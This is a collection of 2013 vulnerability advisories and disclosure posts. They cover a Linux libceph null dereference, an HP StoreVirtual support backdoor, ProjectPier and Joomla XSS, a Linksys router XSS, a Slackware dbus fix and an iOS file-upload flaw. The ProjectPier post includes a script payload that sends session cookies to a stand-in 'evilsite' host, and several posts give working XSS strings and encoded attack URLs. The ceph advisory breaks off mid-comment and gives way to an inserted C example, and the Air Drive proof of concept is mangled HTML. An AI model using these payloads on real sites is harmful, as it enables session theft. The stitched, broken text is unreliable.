(CVE-2013-1059) Linux Kernel libceph Null Pointer Dereference Vulnerability
Original URL: http://hkpco.kr/advisory/CVE-2013-1059.txt

Linux Kernel libceph Null Pointer Dereference Vulnerability (CVE-2013-1059)

Author  - Chanam Park (@hkpco)
Website - http://hkpco.kr/
Date    - 2013. 07. 06

0. Introduction

This is a very brief advisory, written just to record a vulnerability I discovered in my spare time. A remote attacker acting as a malicious ceph monitor can cause a denial-of-service condition by sending a crafted auth_reply message. It could possibly lead to other impacts such as remote code execution if combined with other vulnerabilities. The explanation is based on Linux kernel 3.10, which is the latest version at the time of writing.

1. What's Ceph?

Check the links below.
http://en.wikipedia.org/wiki/Ceph_(storage)
http://ceph.com/

2. Vulnerability

The vulnerability is a null pointer dereference that can be used to crash the kernel remotely. Here I will walk through the code flow leading to it. Let's start with the dispatch() function, which handles incoming auth messages from the ceph monitor.

http://lxr.linux.no/linux+v3.10/net/ceph/mon_client.c
---
static void dispatch(struct ceph_connection *con, struct ceph_msg *msg)
{
    struct ceph_mon_client *monc = con->private;
    int type = le16_to_cpu(msg->hdr.type);

    if (!monc)
        return;

    switch (type) {
    case CEPH_MSG_AUTH_REPLY:
        handle_auth_reply(monc, msg);    *** [1] ***
        break;
..
---

As shown in part [1], it calls handle_auth_reply() once the ceph client receives the auth reply message from the monitor. Next, see the handle_auth_reply() implementation in the same module.

---
static void handle_auth_reply(struct ceph_mon_client *monc,
                              struct ceph_msg *msg)
{
    int ret;
    int was_auth = 0;
    int had_debugfs_info, init_debugfs = 0;

    mutex_lock(&monc->mutex);
    had_debugfs_info = have_debugfs_info(monc);
    was_auth = ceph_auth_is_authenticated(monc->auth);
    monc->pending_auth = 0;
    ret = ceph_handle_auth_reply(monc->auth, msg->front.iov_base,    *** [2] ***
                                 msg->front.iov_len,
                                 monc->m_auth->front.iov_base,
                                 monc->m_auth->front_max);
..
---

At part [2], it calls ceph_handle_auth_reply(). Let's take a look at that function.

http://lxr.linux.no/linux+v3.10/net/ceph/auth.c
---
int ceph_handle_auth_reply(struct ceph_auth_client *ac,
                           void *buf, size_t len,
                           void *reply_buf, size_t reply_len)
{
    void *p = buf;
    void *end = buf + len;
    int protocol;
..
    ret = ac->ops->handle_reply(ac, result, payload, payload_end);
    if (ret == -EAGAIN) {
        ret = ceph_build_auth_request(ac, reply_buf, reply_len);    *** [3] ***
    } else if (ret) {
        pr_err("auth method '%s' error %d\n", ac->ops->name, ret);
    }
---

As you can see in part [3] above, ceph_build_auth_request() contains the code that causes the null pointer dereference. Let's see how the function is implemented.

http://lxr.linux.no/linux+v3.10/net/ceph/auth.c
---
static int ceph_build_auth_request(struct ceph_auth_client *ac,
                                   void *msg_buf, size_t msg_len)
{
    struct ceph_mon_request_header *monhdr = msg_buf;
    void *p = monhdr + 1;
    void *end = msg_buf + msg_len;
    int ret;

    monhdr->have_version = 0;
    monhdr->session_mon = cpu_to_le16(-1);
    monhdr->session_mon_tid = 0;

    ceph_encode_32(&p, ac->protocol);

    ret = ac->ops->build_request(ac, p + sizeof(u32), end);    *** [3] ***
    if (ret < 0) {
        pr_err("error %d building auth method %s request\n", ret,
               ac->ops->name);
        goto out;
    }
    dout(" built request %d bytes\n", ret);
    ceph_encode_32(&p, ret);
    ret = p + ret - msg_buf;
out:
    return ret;
}
---

The code above, at part [3], calls a function pointer taken from the ceph_auth_client_ops structure without checking whether it is null. Moreover, as the next part shows, some function pointers in that structure are not defined at all by every auth backend. Here is the problematic structure definition.

http://lxr.linux.no/linux+v3.9.6/include/linux/ceph/auth.h
---
..
struct ceph_auth_client_ops {
    const char *name;
..
    /*
     * build requests and process replies during monitor
     * handshake. if
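The following is an added example, not code from the advisory or from the kernel: a user-space model of the unchecked function-pointer call at part [3], with a hardened variant beside it that refuses to call a callback the backend never defined. The backend names "x" and "none", build_auth_request_checked() and demo_result() are assumed names for this illustration; the actual upstream fix is not shown on this page.

```c
/* Added example, not from the advisory or the kernel: a user-space model of
 * the ops-table dispatch shown above.  The backend named "none" leaves
 * build_request unset, as the advisory says some backends do, so an unchecked
 * call through the table dereferences a NULL function pointer.  The
 * hypothetical build_auth_request_checked() validates the pointer first
 * and fails closed with -EINVAL instead of crashing. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

struct auth_client;

/* Cut-down ceph_auth_client_ops: just the two callbacks on the reply path. */
struct auth_client_ops {
    const char *name;
    int (*handle_reply)(struct auth_client *ac, int result);
    int (*build_request)(struct auth_client *ac, void *buf, void *end);
};

struct auth_client {
    const struct auth_client_ops *ops;
};

/* A non-zero result from the monitor makes the client rebuild its request:
 * the -EAGAIN branch of ceph_handle_auth_reply() above. */
static int model_handle_reply(struct auth_client *ac, int result)
{
    (void)ac;
    return result == 0 ? 0 : -EAGAIN;
}

/* "x" backend: implements build_request with a constructed payload. */
static int x_build_request(struct auth_client *ac, void *buf, void *end)
{
    static const char body[] = "x-auth-request";      /* constructed bytes */
    size_t n = sizeof body - 1;
    (void)ac;
    if ((size_t)((char *)end - (char *)buf) < n)
        return -EINVAL;                                /* does not fit */
    memcpy(buf, body, n);
    return (int)n;                                     /* bytes written */
}

static const struct auth_client_ops ops_x    = { "x",    model_handle_reply, x_build_request };
static const struct auth_client_ops ops_none = { "none", model_handle_reply, NULL };

/* Same shape as the call at part [3]: with ops_none this is the crash. */
int build_auth_request_unchecked(struct auth_client *ac, void *buf, void *end)
{
    return ac->ops->build_request(ac, buf, end);
}

/* Hardened variant: verify the callback exists before calling through it. */
int build_auth_request_checked(struct auth_client *ac, void *buf, void *end)
{
    if (!ac->ops || !ac->ops->build_request) {
        fprintf(stderr, "auth method %s has no build_request\n",
                ac->ops ? ac->ops->name : "(null)");
        return -EINVAL;
    }
    return ac->ops->build_request(ac, buf, end);
}

/* The reply path as the advisory traces it: handle_reply, then on -EAGAIN
 * build a new request into out[].  Returns bytes built, 0, or -errno. */
int handle_auth_reply_model(struct auth_client *ac, int mon_result,
                            char *out, size_t out_len)
{
    int ret = ac->ops->handle_reply(ac, mon_result);
    if (ret == -EAGAIN)
        ret = build_auth_request_checked(ac, out, out + out_len);
    return ret;
}

/* Entry point over constructed clients: method is "x" or "none".
 * demo_result("x", 1) returns 14; demo_result("none", 1) returns -EINVAL. */
int demo_result(const char *method, int mon_result)
{
    char buf[64];
    struct auth_client ac = { strcmp(method, "x") == 0 ? &ops_x : &ops_none };
    return handle_auth_reply_model(&ac, mon_result, buf, sizeof buf);
}
```

With the "none" backend the checked path logs and returns an error where the unchecked path would dereference NULL, which is the same outcome a kernel-side pointer check gives a malicious monitor: a failed handshake instead of a crash.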
[security bulletin] HPSBST02896 rev.1 - HP StoreVirtual Storage, Remote Unauthorized Access
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03825537

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03825537
Version: 1

HPSBST02896 rev.1 - HP StoreVirtual Storage, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-07-09
Last Updated: 2013-07-09

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP StoreVirtual Storage. This vulnerability could be remotely exploited to gain unauthorized access to the device.

All HP StoreVirtual Storage systems are equipped with a mechanism that allows HP support to access the underlying operating system if permission and access are provided by the customer. This functionality cannot be disabled today. HP has acknowledged this vulnerability and will provide a patch that will allow customers to disable the support access mechanism on or before July 17, 2013.

HP StoreVirtual products are storage appliances that use a custom operating system, LeftHand OS, which is not accessible to the end user. Limited access is available to the user via the HP StoreVirtual Command-Line Interface (CLiQ); however, root access is blocked. Root access may be requested by HP Support in some cases to help customers resolve complex support issues. To facilitate these cases, a challenge-response-based one-time password utility is employed by HP Support to gain root access to systems when the customer has granted permission and network access to the system. The one-time password utility protects the root access to prevent repeated access to the system with the same pass phrase.

Root access to the LeftHand OS does not provide access to the user data being stored on the system.

References: CVE-2013-2352 (SSRT101257)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

This issue affects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and earlier on the following HP StoreVirtual devices:

  HP P4300
  HP P4500
  HP P4300 G2
  HP P4500 G2
  HP P4800 G2
  HP P4900 G2
  HP P4000 VSA
  HP StoreVirtual 4130
  HP StoreVirtual 4330
  HP StoreVirtual 4530
  HP StoreVirtual 4630
  HP StoreVirtual 4730
  HP StoreVirtual VSA
  LeftHand NSM2060
  Dell PowerEdge 2950
  HP DL320S
  IBM System x3650
  LeftHand NSM2060 G2
  LeftHand NSM2120 G2
  LeftHand VSA

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference           Base Vector                 Base Score
  CVE-2013-2352       (AV:N/AC:L/Au:N/C:N/I:C/A:C)    9.4
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com

RESOLUTION

HP will provide a patch that will allow customers to disable the support access mechanism on or before July 17, 2013. When the patch for this issue is available, customers will need to upgrade their HP StoreVirtual systems in order to have the ability to disable support access. HP Support may still request root access to customer systems in order to resolve certain support issues.

HISTORY

Version:1 (rev.1) - 9 July 2013 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact the normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

  3C = 3COM
  3P = 3rd Party Software
  GN = HP General Software
  HF = HP Hardware and Firmware
  MP = MPE/iX
  MU = Multi-Platform Software
  NS = NonStop Servers
  OV = OpenVMS
  PI = Printing and Imaging
  PV = ProCurve
  ST = Storage Software
  TU = Tru64 UNIX
  UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any
Re: Project Pier Web Vulnerabilities
Mitre has assigned the following CVEs for these issues in Project Pier:

XSS: CVE-2013-3635
Session cookies lack HttpOnly flag: CVE-2013-3636
Session cookies lack Secure flag: CVE-2013-3637

On Tue, May 21, 2013 at 9:26 PM, the infinitenigma <theinfiniteni...@gmail.com> wrote:

Summary
Software  : ProjectPier
Version   : 0.8.8 (other versions untested)
Website   : http://www.projectpier.org
Issue     : XSS (stored), Insecure Cookie storage
CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N)
CVSS Score: 7.9
Researcher: Carl Benedict

Product Description
ProjectPier is a Free, Open-Source, PHP web application for managing tasks, projects and teams through an intuitive web interface.

Details
The ProjectPier web application is affected by stored XSS and insecure cookie storage. The combination of these two vulnerabilities can lead to full compromise of application credentials by stealing session cookies. The stored XSS can be found in the Contact Name, Contact Company Name, and Contact Description fields.

Proof of Concept
Entering any of the following strings into the Contact Name, Contact Company Name, or Company Description fields will generate a JavaScript alert dialog when viewing Contacts:

<script>alert(1)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

Cookie insecurity:
The session cookies are not protected by the HttpOnly or Secure flags, allowing them to be accessed via JavaScript and sent over HTTP.

Basic JavaScript alert, returning cookie values:
<script>alert(document.cookie)</script>

JavaScript that sends all cookie values to 'http://evilsite' for logging and reuse on the attacker side:
<script>var url1 = "<img src=http://evilsite/" + encodeURIComponent(document.cookie) + ">"; document.writeln(url1);</script>

History
11/07/2012 : Initial contact
11/07/2012 : Vendor response. Fix planned
11/12/2012 : Update requested
05/21/2013 : No updates. Advisory released

References
Bug Report : http://www.projectpier.org/node/4520
Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg
Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg
Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg

-- ∞
Re: Cisco/Linksys E1200 N300 Reflected XSS
Mitre has assigned the following CVE for this issue: CVE-2013-2679

On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict <theinfiniteni...@gmail.com> wrote:

Summary
Software  : Cisco/Linksys Router OS
Hardware  : E1200 N300 (others currently untested)
Version   : 2.0.04 (others currently untested)
Website   : http://www.linksys.com
Issue     : Reflected XSS
Severity  : Medium
Researcher: Carl Benedict (theinfinitenigma)

Product Description
The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.

Details
The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused by a lack of input validation and poor/missing server-side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.

Sample URL #1 (HTTP GET request):
http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27

Sample URL #2 (HTTP GET request):
http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27change_action=submit_type=action=Applynow_proto=dhcpdaylight_time=1switch_mode=0hnap_devicename=Cisco10002need_reboot=0user_language=wait_time=0dhcp_start=100dhcp_start_conflict=0lan_ipaddr=4ppp_demand_pppoe=9ppp_demand_pptp=9ppp_demand_l2tp=9ppp_demand_hb=9wan_ipv6_proto=dhcp-tunneldetect_lang=ENwan_proto=dhcpwan_hostname=wan_domain=mtu_enable=0lan_ipaddr_0=192lan_ipaddr_1=168lan_ipaddr_2=1lan_ipaddr_3=1lan_netmask=255.255.255.0machine_name=Cisco10002lan_proto=dhcpdhcp_check=dhcp_start_tmp=100dhcp_num=50dhcp_lease=0wan_dns=4wan_dns0_0=0wan_dns0_1=0wan_dns0_2=0wan_dns0_3=0wan_dns1_0=0wan_dns1_1=0wan_dns1_2=0wan_dns1_3=0wan_dns2_0=0wan_dns2_1=0wan_dns2_2=0wan_dns2_3=0wan_wins=4wan_wins_0=0wan_wins_1=0wan_wins_2=0wan_wins_3=0time_zone=-08+1+1_daylight_time=1

History
04/26/2013 : Discovery
04/27/2013 : Advisory released

-- ∞
[slackware-security] dbus (SSA:2013-191-01)
[slackware-security] dbus (SSA:2013-191-01)

New dbus packages are available for Slackware 14.0, and -current to fix a security issue.

Here are the details from the Slackware 14.0 ChangeLog:
+--------------------------+
patches/packages/dbus-1.4.20-i486-4_slack14.0.txz: Rebuilt.
  This update fixes a security issue where misuse of va_list could be used
  to cause a denial of service for system services.
  Vulnerability reported by Alexandru Cornea.
  For more information, see:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2168
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/dbus-1.4.20-i486-4_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/dbus-1.4.20-x86_64-4_slack14.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/dbus-1.6.12-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/dbus-1.6.12-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 14.0 package:
a720afc6cb939df64d9b6e15ad3d20ff  dbus-1.4.20-i486-4_slack14.0.txz

Slackware x86_64 14.0 package:
ff619d4caa1c438435bad5cc5d57c24c  dbus-1.4.20-x86_64-4_slack14.0.txz

Slackware -current package:
f3f0e28aecabb58b212d3bd580a194e4  a/dbus-1.6.12-i486-1.txz

Slackware x86_64 -current package:
cfd43378f0947229b58e95396192a7b7  a/dbus-1.6.12-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg dbus-1.4.20-i486-4_slack14.0.txz

+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com
+-----+
VULNERABLE (3rd party) components in Adobe Reader 11.0.03, and dangling reference to Acrobat.exe
Hi @ll,

the current Adobe Reader 11.0.03 installs the following VULNERABLE (3rd party) components:

1. Adobe Flash Player Plugin 11.5.502.110

   | X:\filever.exe /S %ProgramFiles%\Adobe\npswf*.dll
   |
   | x:\program files\adobe\reader 11.0\reader\npswf*.dll
   | --a-- W32i DLL ENU 11.5.502.110 shp 14,588,632 05-11-2013 npswf32.dll

   Cf. http://www.adobe.com/support/security/bulletins/apsb13-17.html,
       http://www.adobe.com/support/security/bulletins/apsb13-16.html,
       http://www.adobe.com/support/security/bulletins/apsb13-14.html,
       http://www.adobe.com/support/security/bulletins/apsb13-11.html,
       http://www.adobe.com/support/security/bulletins/apsb13-09.html,
       http://www.adobe.com/support/security/bulletins/apsb13-08.html,
       http://www.adobe.com/support/security/bulletins/apsb13-05.html,
       http://www.adobe.com/support/security/bulletins/apsb13-04.html,
       http://www.adobe.com/support/security/bulletins/apsb13-01.html
   and http://www.adobe.com/support/security/bulletins/apsb12-27.html

   The wise guys at Adobe missed 10 security updates of their own product!

2. MSVC++ 2008 runtime libraries 9.0.21022.8

   | X:\filever.exe /S %SystemRoot%\WinSxS\msvc?90.dll
   |
   | x:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvc?90.dll
   | --a-- W32i DLL ENU 9.0.21022.8 shp 224,768 11-06-2007 msvcm90.dll
   | --a-- W32i DLL ENU 9.0.21022.8 shp 568,832 11-07-2007 msvcp90.dll
   | --a-- W32i DLL ENU 9.0.21022.8 shp 655,872 11-07-2007 msvcr90.dll

   These DLLs have been updated several times since 2007-11-07, cf.
   http://support.microsoft.com/kb/973551 and http://support.microsoft.com/kb/973552
   alias http://www.microsoft.com/technet/security/bulletin/ms09-035
   as well as
   http://support.microsoft.com/kb/2467174 and http://support.microsoft.com/kb/2538243
   alias http://www.microsoft.com/technet/security/bulletin/ms11-025

   JFTR: Adobe Reader XI was released 2012-09-24, more than one year after MS11-025!

3. MSVC++ 2010 runtime libraries 10.0.40219.1

   | X:\filever.exe /S %SystemRoot%\System32\msvc?100.dll
   |
   | x:\windows\system32\msvcp100.dll
   | --a-- W32i DLL ENU 10.0.40219.1 shp 421,200 02-19-2011 msvcp100.dll
   |
   | x:\windowsp\system32\msvcr100.dll
   | --a-- W32i DLL ENU 10.0.40219.1 shp 773,968 02-19-2011 msvcr100.dll

   Cf. http://support.microsoft.com/kb/24671743 and http://support.microsoft.com/kb/2565063
   alias http://www.microsoft.com/technet/security/bulletin/ms11-025

   JFTR: Adobe Reader XI was released 2012-09-24, more than one year after MS11-025!

   Unfortunately, the wise guys at Adobe don't know the platform on which their product runs and include the MSVC++ 2008 and 2010 runtimes via MSI merge module. Due to a well-known idiosyncrasy of Windows Update Agent, M$FT components installed via MSI merge module are NOT detected and thus not updated by M$FT ... although M$FT advises their users to do so!

   From the FAQ section of http://www.microsoft.com/technet/security/bulletin/ms11-025

   | In the case where a system has no MFC applications currently installed but
   | does have the vulnerable Visual Studio or Visual C++ runtimes installed,
   | Microsoft recommends that users install this update as a defense-in-depth
   | measure, in case of an attack vector being introduced or becoming known at
   | a later time.

4. Additionally, the following dangling references to Acrobat.exe are created:

   [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.acrobatsecuritysettings\OpenWithList\Acrobat.exe]
   @=""

   [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pdfxml\OpenWithList\Acrobat.exe]
   @=""

   [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AcroExch.Document.11\protocol\StdFileEditing\server]
   @="\"Acrobat.exe\""

   The latter allows the execution of a rogue program named Acrobat.exe from CWD via OLE in the security context of the logged-on user.
   Cf. http://technet.microsoft.com/security/advisory/2269637

5. On Windows XP the following superfluous registry entries are created:

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights]

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy]

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B3FB63-66F4-4EFC-B717-BB283B85E79B}]
   "Policy"=dword:0003
   "AppPath"="X:\\Program Files\\Adobe\\Reader 11.0\\Reader\\"
   "AppName"="AcroBroker.exe"

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{358E6F10-DE8A-4602-8424-179CA217F8EE}]
   "Policy"=dword:0003
   "AppPath"="X:\\Program Files\\Adobe\\Reader 11.0\\Reader"
   "AppName"="AcroRd32Info.exe"

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{76E2369A-75BA-41F9-8B9E-16059E5CF9A6}]
   "Policy"=dword:0003
   "AppPath"="X:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\"
   "AppName"="AdobeARM.exe"

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8E1F80F4-953F-41E7-8460-E64AE5BE4ED3}]
   "Policy"=dword:0003
[Foreground Security 2013-001]: Joomla AICONTACTSAFE 2.0.19 Extension Cross-Site Scripting (XSS) vulnerability
Joomla AICONTACTSAFE 2.0.19 Extension Cross-Site Scripting (XSS) vulnerability

FOREGROUND SECURITY, SECURITY ADVISORY 2013-001

- Original release date: July 10, 2013
- Discovered by: Adam Willard (Software Security Analyst at Foreground Security)
- Verified by: Jose Carlos de Arriba (Pentest Team Manager at Foreground Security)
- Contact: (awillard (at) foregroundsecurity (dot) com)
- Severity: 4.3/10 (Base CVSS Score)

I. VULNERABILITY
- Algis Info aiContactSafe Extension 2.0.19 (latest) Cross-Site Scripting (XSS) vulnerability (prior versions have not been checked but could be vulnerable too).

II. BACKGROUND
- Algis Info aiContactSafe is a native Joomla component developed by Algis Info. You can use it to place a complex contact form on your web page. Here are some of the facilities that it can offer:
  - custom fields
  - captcha
  - custom text related to the contact information
  - multilingual support (through Joomfish)
  - SEF through Artio JoomSEF or sh404SEF

III. DESCRIPTION
- Algis Info aiContactSafe 2.0.19 (latest) Extension presents a Cross-Site Scripting (XSS) vulnerability in the URL due to insufficient input/output sanitization. A malicious user could perform session hijacking or phishing attacks.

IV. PROOF OF CONCEPT
- (This section has been removed per vendor request).

V. BUSINESS IMPACT
- An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED
- Joomla Extension, AlgisInfo com_aicontactsafe_2_0_19_stable Extension (prior versions have not been checked but could be vulnerable too).

VII. SOLUTION
- Fixed in the 2.0.21.stable version release.

VIII. REFERENCES
- http://www.algisinfo.com/
- http://www.foregroundsecurity.com/

IX. CREDITS
- This vulnerability has been discovered by Adam Willard (awillard (at) foregroundsecurity (dot) com); verification and release coordination by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com).

X. REVISION HISTORY
- July 10, 2013: Initial release.

XI. DISCLOSURE TIMELINE
- April 2, 2013: Vulnerability discovered by Adam Willard.
- April 3, 2013: Vulnerability verified by Jose Carlos de Arriba.
- April 15: AlgisInfo aiContactSafe author contacted by email.
- April 15: Response from author and security advisory sent to him.
- April 16: Vulnerability fixed in the 2.0.21.stable version release.
- July 10: Security advisory released.

XII. LEGAL NOTICES
- The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.

Jose Carlos de Arriba, CISSP
Pentest Team Manager
Foreground Security
305-340-9964
jcarriba (at) foregroundsecurity . com
www.foregroundsecurity.com
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
Title:
======
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability

Date:
=====
2013-07-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1000

VL-ID:
======
1000

Common Vulnerability Scoring System:
====================================
6.7

Introduction:
=============
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.

Features ...

[Server] function
Easily access your files from any web browser. Easily upload and download your photo from photo libraries via web browser.

[My Files] function
Preview/Move/Copy/Delete/Unzip/Rename/Email file and Create new directory on your iPhone, iPod touch, iPad.
Image: png, jpg, gif
Document: Word, PowerPoint, Excel, PDF
Compressed: zip
Text-base: txt, html, php, js, css
Media: mp3, wav, mp4, mov
Save Word, PowerPoint, Excel and PDF files from other apps to Air Drive, include Apple's Email app and Safari. Open All types of file from Air Drive to other apps such as Dropbox.

[Settings] function
Add Password to prevent unauthorized access to your files. Customize the Server port and Real-time On/Off the sharing functions and takes effect immediately to restrict the access from web browser.

(Copy of the Homepage: https://itunes.apple.com/de/app/air-drive-plus-your-file-manager/id422806570 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a remote file include vulnerability in the Air Drive Plus 2.4 application (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-09: Public Disclosure (Vulnerability Laboratory)

Status:
=======
Published

Affected Products:
==================
Apple AppStore
Product: Air Drive Plus 2.4

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A local file include and arbitrary file upload web vulnerability has been detected in the Air Drive Plus 2.4 application (Apple iOS - iPad & iPhone). The vulnerability allows remote attackers to upload files with multiple extensions via the POST method and then access them without authorization on the application side of the service.

The vulnerability is located in the file upload/add (AirDriveAction_file_add) module of the web server (http://localhost:8000/) when it processes a request carrying a manipulated filename via POST. The injected file is then accessible via the index listing module of the application. Remote attackers can replace the filename with one carrying a double or triple extension via the POST method to bypass the upload validation and filter process. After the upload, the attacker accesses the file under one extension and switches it to the other to execute, for example, PHP code.

A persistent script code injection has also been detected in the filename parameter. Attackers can tamper with the request and replace the file name with persistent malicious script code or tags. The code is executed on the main index page when the application lists the object (file) items. Attackers are also able to inject persistent code with local frame requests to gain unauthorized access to application data/apps or restricted application information. The persistent code also executes when an application user deletes the malicious item: the injected code is stored and runs from the delete notification and protection message.

Exploitation of the vulnerability requires no user interaction and no privileged application user account (no password is set by default). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
  [+] Air Drive Plus 2.4 - iTunes or AppStore (Apple)

Vulnerable Module(s):
  [+] File Upload (Web Server) [Remote]

Vulnerable File(s):
  [+] AirDriveAction_file_add

Vulnerable Parameter(s):
  [+] filename

Affected Module(s):
  [+] Application Index Listing (http://localhost:8000/)

Proof of Concept:
=================
The arbitrary file upload vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For demonstration or to reproduce ...

1.1
trtdimg src=Air%20Drive%20-%20Files_files/file.png height=20px width=20px/tdtda target=_blank href=http://192.168.2.104:8000/AirDriveAction_file_show/;/private/var/mobile/Applications;;/private/var/mobile/Applications//a/td td27,27KB/tdtd align=center2013-07-08 23:07:52/tdtd align=center a onclick=javascript:delfile(/private/var/mobile/Applications); class=transparent_buttonDelete/a/td/tr

1.2
trtdimg src=Air%20Drive%20-%20Files_files/file.png height=20px width=20px/tdtda target=_blank